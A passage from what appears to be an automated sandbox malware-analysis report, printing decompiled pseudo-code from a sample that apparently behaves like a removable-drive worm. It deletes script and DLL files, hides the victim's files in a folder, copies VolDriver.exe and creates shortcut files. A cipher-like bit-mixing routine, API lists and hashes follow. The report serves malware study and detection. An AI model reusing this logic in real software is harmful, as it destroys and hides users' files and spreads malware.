                                                                                                                                                                                                                                                                  					_v4824 = L"*.dll";
                                                                                                                                                                                                                                                                  					_v4820 = L"*.vbe";
                                                                                                                                                                                                                                                                  					_v4816 = L"*.bat";
                                                                                                                                                                                                                                                                  					_v4812 = L"*.inf";
                                                                                                                                                                                                                                                                  					_v4808 = _v2088;
                                                                                                                                                                                                                                                                  					_v4804 =  &_v1564;
                                                                                                                                                                                                                                                                  					_v4800 = L"Thumbs.db";
                                                                                                                                                                                                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                                                                                                                                                                                                  					_v4792 = L"desktop.ini";
                                                                                                                                                                                                                                                                  					_v4788 = L"System Volume Information";
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                  							_v4862 = 0;
                                                                                                                                                                                                                                                                  							_v4868 = 0;
                                                                                                                                                                                                                                                                  							while(_v4868 < 6) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                                                                                                                                                                                                  									_v4862 = 1;
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v4868 = _v4868 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								_v4861 = 0;
                                                                                                                                                                                                                                                                  								_v4872 = 0;
                                                                                                                                                                                                                                                                  								while(_v4872 < 0xd) {
                                                                                                                                                                                                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                                                                                                                                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										_t224 = _t224 + 0x10;
                                                                                                                                                                                                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                                                                                                                                                                                                  										DeleteFileW( &_v2084);
                                                                                                                                                                                                                                                                  										_v4861 = 1;
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v4872 = _v4872 + 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                                                                                                                                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										_t224 = _t224 + 0x24;
                                                                                                                                                                                                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											E00404BB0( &_v3132,  &_v524);
                                                                                                                                                                                                                                                                  											_t224 = _t224 + 8;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L43;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L43:
                                                                                                                                                                                                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                                                                                                                                                                                                  					FindClose(_v4256);
                                                                                                                                                                                                                                                                  					goto L45;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}












































                                                                                                                                                                                                                                                                  0x00404cf8
                                                                                                                                                                                                                                                                  0x00404d05
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404d07
                                                                                                                                                                                                                                                                  0x00404d0e
                                                                                                                                                                                                                                                                  0x00404d18
                                                                                                                                                                                                                                                                  0x00404d2f
                                                                                                                                                                                                                                                                  0x00404d4f
                                                                                                                                                                                                                                                                  0x00404d6f
                                                                                                                                                                                                                                                                  0x00404d8f
                                                                                                                                                                                                                                                                  0x00404da8
                                                                                                                                                                                                                                                                  0x00404dae
                                                                                                                                                                                                                                                                  0x00404dc0
                                                                                                                                                                                                                                                                  0x00404dc9
                                                                                                                                                                                                                                                                  0x00404dce
                                                                                                                                                                                                                                                                  0x00404dd1
                                                                                                                                                                                                                                                                  0x00404dd7
                                                                                                                                                                                                                                                                  0x00404de3
                                                                                                                                                                                                                                                                  0x00404df1
                                                                                                                                                                                                                                                                  0x00404dfe
                                                                                                                                                                                                                                                                  0x00404dfe
                                                                                                                                                                                                                                                                  0x00404de3
                                                                                                                                                                                                                                                                  0x00404e13
                                                                                                                                                                                                                                                                  0x00404e24
                                                                                                                                                                                                                                                                  0x00404e42
                                                                                                                                                                                                                                                                  0x00404e42
                                                                                                                                                                                                                                                                  0x00404e57
                                                                                                                                                                                                                                                                  0x00404e7a
                                                                                                                                                                                                                                                                  0x00404e7a
                                                                                                                                                                                                                                                                  0x00404e57
                                                                                                                                                                                                                                                                  0x00404e8f
                                                                                                                                                                                                                                                                  0x00404e97
                                                                                                                                                                                                                                                                  0x00404ebf
                                                                                                                                                                                                                                                                  0x00404ec4
                                                                                                                                                                                                                                                                  0x00404e99
                                                                                                                                                                                                                                                                  0x00404ea7
                                                                                                                                                                                                                                                                  0x00404eac
                                                                                                                                                                                                                                                                  0x00404eac
                                                                                                                                                                                                                                                                  0x00404ed0
                                                                                                                                                                                                                                                                  0x00404ed0
                                                                                                                                                                                                                                                                  0x00404eea
                                                                                                                                                                                                                                                                  0x00404ef7
                                                                                                                                                                                                                                                                  0x004051bf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404efd
                                                                                                                                                                                                                                                                  0x00404efd
                                                                                                                                                                                                                                                                  0x00404f07
                                                                                                                                                                                                                                                                  0x00404f11
                                                                                                                                                                                                                                                                  0x00404f1b
                                                                                                                                                                                                                                                                  0x00404f25
                                                                                                                                                                                                                                                                  0x00404f2f
                                                                                                                                                                                                                                                                  0x00404f39
                                                                                                                                                                                                                                                                  0x00404f43
                                                                                                                                                                                                                                                                  0x00404f4d
                                                                                                                                                                                                                                                                  0x00404f57
                                                                                                                                                                                                                                                                  0x00404f61
                                                                                                                                                                                                                                                                  0x00404f6b
                                                                                                                                                                                                                                                                  0x00404f75
                                                                                                                                                                                                                                                                  0x00404f85
                                                                                                                                                                                                                                                                  0x00404f91
                                                                                                                                                                                                                                                                  0x00404f97
                                                                                                                                                                                                                                                                  0x00404fa1
                                                                                                                                                                                                                                                                  0x00404fab
                                                                                                                                                                                                                                                                  0x00404fb5
                                                                                                                                                                                                                                                                  0x00404fbf
                                                                                                                                                                                                                                                                  0x00404fd3
                                                                                                                                                                                                                                                                  0x00404ff0
                                                                                                                                                                                                                                                                  0x00404ff7
                                                                                                                                                                                                                                                                  0x00405012
                                                                                                                                                                                                                                                                  0x00405038
                                                                                                                                                                                                                                                                  0x0040503c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040503c
                                                                                                                                                                                                                                                                  0x0040500c
                                                                                                                                                                                                                                                                  0x0040500c
                                                                                                                                                                                                                                                                  0x00405050
                                                                                                                                                                                                                                                                  0x00405057
                                                                                                                                                                                                                                                                  0x0040505e
                                                                                                                                                                                                                                                                  0x00405079
                                                                                                                                                                                                                                                                  0x0040509f
                                                                                                                                                                                                                                                                  0x004050ba
                                                                                                                                                                                                                                                                  0x004050c0
                                                                                                                                                                                                                                                                  0x004050cf
                                                                                                                                                                                                                                                                  0x004050dc
                                                                                                                                                                                                                                                                  0x004050e2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004050e2
                                                                                                                                                                                                                                                                  0x00405073
                                                                                                                                                                                                                                                                  0x00405073
                                                                                                                                                                                                                                                                  0x004050f9
                                                                                                                                                                                                                                                                  0x0040510f
                                                                                                                                                                                                                                                                  0x0040512d
                                                                                                                                                                                                                                                                  0x00405154
                                                                                                                                                                                                                                                                  0x0040515a
                                                                                                                                                                                                                                                                  0x00405166
                                                                                                                                                                                                                                                                  0x00405190
                                                                                                                                                                                                                                                                  0x00405168
                                                                                                                                                                                                                                                                  0x00405176
                                                                                                                                                                                                                                                                  0x0040517b
                                                                                                                                                                                                                                                                  0x0040517b
                                                                                                                                                                                                                                                                  0x00405166
                                                                                                                                                                                                                                                                  0x0040510f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004050f9
                                                                                                                                                                                                                                                                  0x00405052
                                                                                                                                                                                                                                                                  0x00405196
                                                                                                                                                                                                                                                                  0x004051aa
                                                                                                                                                                                                                                                                  0x004051b9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004051b9

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _chkstk.NTDLL(?,00405340,?,?,?), ref: 00404CF8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D2F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D4F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D6F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D8F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404DA8
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404DB8
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404DF1
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404DFE
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E0B
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E1C
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404E2F
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404E42
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E4F
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00412F78,?,00000000), ref: 00404E67
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404E7A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                                                                                                                                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$,,A$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                                  • API String ID: 3833403615-838585530
                                                                                                                                                                                                                                                                  • Opcode ID: fe551baaaed48645d904588363baa8fbaef1bbeba22468993180c2cc8ffb09a2
                                                                                                                                                                                                                                                                  • Instruction ID: ad37720c555eb0932884b17657b7396cff93d0f2d5161226f8479edb68281811
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe551baaaed48645d904588363baa8fbaef1bbeba22468993180c2cc8ffb09a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76D15DB59102189BDB20DF60DD44BEA77B8BF44304F0085FAE109B6581D7B89BD9CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00406330(intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				signed int _t1394;
                                                                                                                                                                                                                                                                  				signed int _t1396;
                                                                                                                                                                                                                                                                  				signed int _t1397;
                                                                                                                                                                                                                                                                  				signed int _t1398;
                                                                                                                                                                                                                                                                  				signed int _t1399;
                                                                                                                                                                                                                                                                  				signed int _t1403;
                                                                                                                                                                                                                                                                  				signed int _t1413;
                                                                                                                                                                                                                                                                  				intOrPtr _t1414;
                                                                                                                                                                                                                                                                  				signed int _t1424;
                                                                                                                                                                                                                                                                  				intOrPtr _t1425;
                                                                                                                                                                                                                                                                  				signed int _t1435;
                                                                                                                                                                                                                                                                  				intOrPtr _t1436;
                                                                                                                                                                                                                                                                  				signed int _t1446;
                                                                                                                                                                                                                                                                  				intOrPtr _t1447;
                                                                                                                                                                                                                                                                  				signed int _t1457;
                                                                                                                                                                                                                                                                  				intOrPtr _t1458;
                                                                                                                                                                                                                                                                  				signed int _t1468;
                                                                                                                                                                                                                                                                  				intOrPtr _t1469;
                                                                                                                                                                                                                                                                  				signed int _t1479;
                                                                                                                                                                                                                                                                  				intOrPtr _t1480;
                                                                                                                                                                                                                                                                  				signed int _t1490;
                                                                                                                                                                                                                                                                  				intOrPtr _t1491;
                                                                                                                                                                                                                                                                  				signed int _t1501;
                                                                                                                                                                                                                                                                  				intOrPtr _t1502;
                                                                                                                                                                                                                                                                  				signed int _t1512;
                                                                                                                                                                                                                                                                  				intOrPtr _t1513;
                                                                                                                                                                                                                                                                  				signed int _t1523;
                                                                                                                                                                                                                                                                  				intOrPtr _t1524;
                                                                                                                                                                                                                                                                  				signed int _t1534;
                                                                                                                                                                                                                                                                  				intOrPtr _t1535;
                                                                                                                                                                                                                                                                  				signed int _t1545;
                                                                                                                                                                                                                                                                  				intOrPtr _t1546;
                                                                                                                                                                                                                                                                  				signed int _t1556;
                                                                                                                                                                                                                                                                  				intOrPtr _t1557;
                                                                                                                                                                                                                                                                  				signed int _t1567;
                                                                                                                                                                                                                                                                  				intOrPtr _t1568;
                                                                                                                                                                                                                                                                  				signed int _t1577;
                                                                                                                                                                                                                                                                  				intOrPtr _t1579;
                                                                                                                                                                                                                                                                  				intOrPtr _t1580;
                                                                                                                                                                                                                                                                  				intOrPtr _t1581;
                                                                                                                                                                                                                                                                  				signed int _t1582;
                                                                                                                                                                                                                                                                  				signed int _t1588;
                                                                                                                                                                                                                                                                  				signed int _t1589;
                                                                                                                                                                                                                                                                  				signed int _t1590;
                                                                                                                                                                                                                                                                  				signed int _t1591;
                                                                                                                                                                                                                                                                  				signed int _t1595;
                                                                                                                                                                                                                                                                  				signed int _t1598;
                                                                                                                                                                                                                                                                  				signed int _t1599;
                                                                                                                                                                                                                                                                  				signed int _t1600;
                                                                                                                                                                                                                                                                  				signed int _t1601;
                                                                                                                                                                                                                                                                  				signed int _t1605;
                                                                                                                                                                                                                                                                  				signed int _t1608;
                                                                                                                                                                                                                                                                  				signed int _t1609;
                                                                                                                                                                                                                                                                  				signed int _t1610;
                                                                                                                                                                                                                                                                  				signed int _t1611;
                                                                                                                                                                                                                                                                  				signed int _t1615;
                                                                                                                                                                                                                                                                  				signed int _t1618;
                                                                                                                                                                                                                                                                  				signed int _t1619;
                                                                                                                                                                                                                                                                  				signed int _t1620;
                                                                                                                                                                                                                                                                  				signed int _t1621;
                                                                                                                                                                                                                                                                  				signed int _t1625;
                                                                                                                                                                                                                                                                  				signed int _t1628;
                                                                                                                                                                                                                                                                  				signed int _t1629;
                                                                                                                                                                                                                                                                  				signed int _t1630;
                                                                                                                                                                                                                                                                  				signed int _t1631;
                                                                                                                                                                                                                                                                  				signed int _t1635;
                                                                                                                                                                                                                                                                  				signed int _t1638;
                                                                                                                                                                                                                                                                  				signed int _t1639;
                                                                                                                                                                                                                                                                  				signed int _t1640;
                                                                                                                                                                                                                                                                  				signed int _t1641;
                                                                                                                                                                                                                                                                  				signed int _t1645;
                                                                                                                                                                                                                                                                  				signed int _t1648;
                                                                                                                                                                                                                                                                  				signed int _t1649;
                                                                                                                                                                                                                                                                  				signed int _t1650;
                                                                                                                                                                                                                                                                  				signed int _t1651;
                                                                                                                                                                                                                                                                  				signed int _t1655;
                                                                                                                                                                                                                                                                  				signed int _t1658;
                                                                                                                                                                                                                                                                  				signed int _t1659;
                                                                                                                                                                                                                                                                  				signed int _t1660;
                                                                                                                                                                                                                                                                  				signed int _t1661;
                                                                                                                                                                                                                                                                  				signed int _t1665;
                                                                                                                                                                                                                                                                  				signed int _t1668;
                                                                                                                                                                                                                                                                  				signed int _t1669;
                                                                                                                                                                                                                                                                  				signed int _t1670;
                                                                                                                                                                                                                                                                  				signed int _t1671;
                                                                                                                                                                                                                                                                  				signed int _t1675;
                                                                                                                                                                                                                                                                  				signed int _t1678;
                                                                                                                                                                                                                                                                  				signed int _t1679;
                                                                                                                                                                                                                                                                  				signed int _t1680;
                                                                                                                                                                                                                                                                  				signed int _t1681;
                                                                                                                                                                                                                                                                  				signed int _t1685;
                                                                                                                                                                                                                                                                  				signed int _t1688;
                                                                                                                                                                                                                                                                  				signed int _t1689;
                                                                                                                                                                                                                                                                  				signed int _t1690;
                                                                                                                                                                                                                                                                  				signed int _t1691;
                                                                                                                                                                                                                                                                  				signed int _t1695;
                                                                                                                                                                                                                                                                  				signed int _t1698;
                                                                                                                                                                                                                                                                  				signed int _t1699;
                                                                                                                                                                                                                                                                  				signed int _t1700;
                                                                                                                                                                                                                                                                  				signed int _t1701;
                                                                                                                                                                                                                                                                  				signed int _t1705;
                                                                                                                                                                                                                                                                  				signed int _t1708;
                                                                                                                                                                                                                                                                  				signed int _t1709;
                                                                                                                                                                                                                                                                  				signed int _t1710;
                                                                                                                                                                                                                                                                  				signed int _t1711;
                                                                                                                                                                                                                                                                  				signed int _t1715;
                                                                                                                                                                                                                                                                  				signed int _t1718;
                                                                                                                                                                                                                                                                  				signed int _t1719;
                                                                                                                                                                                                                                                                  				signed int _t1720;
                                                                                                                                                                                                                                                                  				signed int _t1721;
                                                                                                                                                                                                                                                                  				signed int _t1725;
                                                                                                                                                                                                                                                                  				signed int _t1728;
                                                                                                                                                                                                                                                                  				signed int _t1729;
                                                                                                                                                                                                                                                                  				signed int _t1730;
                                                                                                                                                                                                                                                                  				signed int _t1731;
                                                                                                                                                                                                                                                                  				signed int _t1735;
                                                                                                                                                                                                                                                                  				signed int _t1738;
                                                                                                                                                                                                                                                                  				signed int _t1748;
                                                                                                                                                                                                                                                                  				intOrPtr _t1749;
                                                                                                                                                                                                                                                                  				intOrPtr _t1755;
                                                                                                                                                                                                                                                                  				intOrPtr _t1756;
                                                                                                                                                                                                                                                                  				intOrPtr _t1757;
                                                                                                                                                                                                                                                                  				signed int _t1758;
                                                                                                                                                                                                                                                                  				intOrPtr _t1767;
                                                                                                                                                                                                                                                                  				intOrPtr _t1768;
                                                                                                                                                                                                                                                                  				intOrPtr _t1769;
                                                                                                                                                                                                                                                                  				signed int _t1770;
                                                                                                                                                                                                                                                                  				intOrPtr _t1779;
                                                                                                                                                                                                                                                                  				intOrPtr _t1780;
                                                                                                                                                                                                                                                                  				intOrPtr _t1781;
                                                                                                                                                                                                                                                                  				signed int _t1782;
                                                                                                                                                                                                                                                                  				intOrPtr _t1791;
                                                                                                                                                                                                                                                                  				intOrPtr _t1792;
                                                                                                                                                                                                                                                                  				intOrPtr _t1793;
                                                                                                                                                                                                                                                                  				signed int _t1794;
                                                                                                                                                                                                                                                                  				intOrPtr _t1803;
                                                                                                                                                                                                                                                                  				intOrPtr _t1804;
                                                                                                                                                                                                                                                                  				intOrPtr _t1805;
                                                                                                                                                                                                                                                                  				signed int _t1806;
                                                                                                                                                                                                                                                                  				intOrPtr _t1815;
                                                                                                                                                                                                                                                                  				intOrPtr _t1816;
                                                                                                                                                                                                                                                                  				intOrPtr _t1817;
                                                                                                                                                                                                                                                                  				signed int _t1818;
                                                                                                                                                                                                                                                                  				intOrPtr _t1827;
                                                                                                                                                                                                                                                                  				intOrPtr _t1828;
                                                                                                                                                                                                                                                                  				intOrPtr _t1829;
                                                                                                                                                                                                                                                                  				signed int _t1830;
                                                                                                                                                                                                                                                                  				intOrPtr _t1839;
                                                                                                                                                                                                                                                                  				intOrPtr _t1840;
                                                                                                                                                                                                                                                                  				intOrPtr _t1841;
                                                                                                                                                                                                                                                                  				signed int _t1842;
                                                                                                                                                                                                                                                                  				intOrPtr _t1851;
                                                                                                                                                                                                                                                                  				intOrPtr _t1852;
                                                                                                                                                                                                                                                                  				intOrPtr _t1853;
                                                                                                                                                                                                                                                                  				signed int _t1854;
                                                                                                                                                                                                                                                                  				intOrPtr _t1863;
                                                                                                                                                                                                                                                                  				intOrPtr _t1864;
                                                                                                                                                                                                                                                                  				intOrPtr _t1865;
                                                                                                                                                                                                                                                                  				signed int _t1866;
                                                                                                                                                                                                                                                                  				intOrPtr _t1875;
                                                                                                                                                                                                                                                                  				intOrPtr _t1876;
                                                                                                                                                                                                                                                                  				intOrPtr _t1877;
                                                                                                                                                                                                                                                                  				signed int _t1878;
                                                                                                                                                                                                                                                                  				intOrPtr _t1887;
                                                                                                                                                                                                                                                                  				intOrPtr _t1888;
                                                                                                                                                                                                                                                                  				intOrPtr _t1889;
                                                                                                                                                                                                                                                                  				signed int _t1890;
                                                                                                                                                                                                                                                                  				intOrPtr _t1899;
                                                                                                                                                                                                                                                                  				intOrPtr _t1900;
                                                                                                                                                                                                                                                                  				intOrPtr _t1901;
                                                                                                                                                                                                                                                                  				signed int _t1902;
                                                                                                                                                                                                                                                                  				intOrPtr _t1911;
                                                                                                                                                                                                                                                                  				intOrPtr _t1912;
                                                                                                                                                                                                                                                                  				intOrPtr _t1913;
                                                                                                                                                                                                                                                                  				signed int _t1914;
                                                                                                                                                                                                                                                                  				intOrPtr _t1923;
                                                                                                                                                                                                                                                                  				intOrPtr _t1924;
                                                                                                                                                                                                                                                                  				intOrPtr _t1925;
                                                                                                                                                                                                                                                                  				signed int _t1926;
                                                                                                                                                                                                                                                                  				intOrPtr _t2043;
                                                                                                                                                                                                                                                                  				intOrPtr _t2044;
                                                                                                                                                                                                                                                                  				intOrPtr _t2045;
                                                                                                                                                                                                                                                                  				intOrPtr _t2050;
                                                                                                                                                                                                                                                                  				intOrPtr _t2051;
                                                                                                                                                                                                                                                                  				intOrPtr _t2052;
                                                                                                                                                                                                                                                                  				intOrPtr _t2057;
                                                                                                                                                                                                                                                                  				intOrPtr _t2058;
                                                                                                                                                                                                                                                                  				intOrPtr _t2059;
                                                                                                                                                                                                                                                                  				intOrPtr _t2064;
                                                                                                                                                                                                                                                                  				intOrPtr _t2065;
                                                                                                                                                                                                                                                                  				intOrPtr _t2066;
                                                                                                                                                                                                                                                                  				intOrPtr _t2071;
                                                                                                                                                                                                                                                                  				intOrPtr _t2072;
                                                                                                                                                                                                                                                                  				intOrPtr _t2073;
                                                                                                                                                                                                                                                                  				intOrPtr _t2078;
                                                                                                                                                                                                                                                                  				intOrPtr _t2079;
                                                                                                                                                                                                                                                                  				intOrPtr _t2080;
                                                                                                                                                                                                                                                                  				intOrPtr _t2085;
                                                                                                                                                                                                                                                                  				intOrPtr _t2086;
                                                                                                                                                                                                                                                                  				intOrPtr _t2087;
                                                                                                                                                                                                                                                                  				intOrPtr _t2092;
                                                                                                                                                                                                                                                                  				intOrPtr _t2093;
                                                                                                                                                                                                                                                                  				intOrPtr _t2094;
                                                                                                                                                                                                                                                                  				intOrPtr _t2099;
                                                                                                                                                                                                                                                                  				intOrPtr _t2100;
                                                                                                                                                                                                                                                                  				intOrPtr _t2101;
                                                                                                                                                                                                                                                                  				intOrPtr _t2106;
                                                                                                                                                                                                                                                                  				intOrPtr _t2107;
                                                                                                                                                                                                                                                                  				intOrPtr _t2108;
                                                                                                                                                                                                                                                                  				intOrPtr _t2113;
                                                                                                                                                                                                                                                                  				intOrPtr _t2114;
                                                                                                                                                                                                                                                                  				intOrPtr _t2115;
                                                                                                                                                                                                                                                                  				intOrPtr _t2120;
                                                                                                                                                                                                                                                                  				intOrPtr _t2121;
                                                                                                                                                                                                                                                                  				intOrPtr _t2122;
                                                                                                                                                                                                                                                                  				intOrPtr _t2127;
                                                                                                                                                                                                                                                                  				intOrPtr _t2128;
                                                                                                                                                                                                                                                                  				intOrPtr _t2129;
                                                                                                                                                                                                                                                                  				intOrPtr _t2134;
                                                                                                                                                                                                                                                                  				intOrPtr _t2135;
                                                                                                                                                                                                                                                                  				intOrPtr _t2136;
                                                                                                                                                                                                                                                                  				intOrPtr _t2141;
                                                                                                                                                                                                                                                                  				intOrPtr _t2142;
                                                                                                                                                                                                                                                                  				intOrPtr _t2143;
                                                                                                                                                                                                                                                                  				intOrPtr _t2148;
                                                                                                                                                                                                                                                                  				intOrPtr _t2149;
                                                                                                                                                                                                                                                                  				intOrPtr _t2150;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t1394 =  *0x410120; // 0x89abcdef
                                                                                                                                                                                                                                                                  				_v28 = _t1394;
                                                                                                                                                                                                                                                                  				_t1577 =  *0x410124; // 0x1234567
                                                                                                                                                                                                                                                                  				_v24 = _t1577;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0x59;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_t1396 = _a8 << 4;
                                                                                                                                                                                                                                                                  					if(_v32 >= _t1396) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1397 = _v16;
                                                                                                                                                                                                                                                                  					_t1579 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1579 + _t1397 * 8 - 0x2c8);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1579 + _t1397 * 8 - 0x2c4);
                                                                                                                                                                                                                                                                  					_t1398 = _v16;
                                                                                                                                                                                                                                                                  					_t1580 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1580 + _t1398 * 8 - 0x88);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1580 + _t1398 * 8 - 0x84);
                                                                                                                                                                                                                                                                  					_t1399 = _v16;
                                                                                                                                                                                                                                                                  					_t1581 = _a4;
                                                                                                                                                                                                                                                                  					_t1748 = _v16;
                                                                                                                                                                                                                                                                  					_t2043 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1581 + _t1399 * 8 - 0x90) &  *(_t2043 + _t1748 * 8 - 0xa8) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1581 + _t1399 * 8 - 0x8c) &  *(_t2043 + _t1748 * 8 - 0xa4) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1582 = _v16;
                                                                                                                                                                                                                                                                  					_t1749 = _a4;
                                                                                                                                                                                                                                                                  					_t1403 = _v16;
                                                                                                                                                                                                                                                                  					_t2044 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1749 + _t1582 * 8 - 0xf8) &  *(_t2044 + _t1403 * 8 - 0x218) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1749 + _t1582 * 8 - 0xf4) &  *(_t2044 + _t1403 * 8 - 0x214) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1588 = _v16;
                                                                                                                                                                                                                                                                  					_t2045 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2045 + _t1588 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2045 + 4 + _t1588 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1589 = _v16;
                                                                                                                                                                                                                                                                  					_t1755 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1755 + _t1589 * 8 - 0x2c0);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1755 + _t1589 * 8 - 0x2bc);
                                                                                                                                                                                                                                                                  					_t1590 = _v16;
                                                                                                                                                                                                                                                                  					_t1756 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1756 + _t1590 * 8 - 0x80);
